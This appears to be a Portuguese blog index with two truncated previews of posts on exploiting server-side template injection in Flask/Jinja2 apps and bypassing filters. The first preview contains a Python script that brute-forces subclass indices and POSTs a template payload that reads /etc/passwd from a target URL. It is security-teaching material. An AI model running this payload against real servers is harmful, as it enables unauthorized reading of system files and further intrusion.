Injeção de SSTI em aplicações Flask e como contornar
Exploração da classe FileLoader:
import requests
url = input('Digite a URL do alvo: ')
for i in range(500):
payload = f"{{{{''.__class__.__bases__[0].__subclasses__()[{i}].get_data(0, '/etc/passwd')}}}}"
try:
response = requests.post(url, data={"name": payload})
if response.status_code == 200 and '_fr ...
Publicado em 8-5 12:37
Explorando e Contornando Injeções de Template SSTI com Jinja2
Este artigo explora as vulnerabilidades de Server-Side Template Injection (SSTI) utilizando o Jinja2, um popular motor de templates para Python, e as técnicas para contornar filtros de segurança.
Ambiente de Teste e Exploração Inicial
Para iniciar a exploração, é necessário encontrar classes e métodos acessíveis. Um método comum é iterar sobre ...
Publicado em 6-12 23:48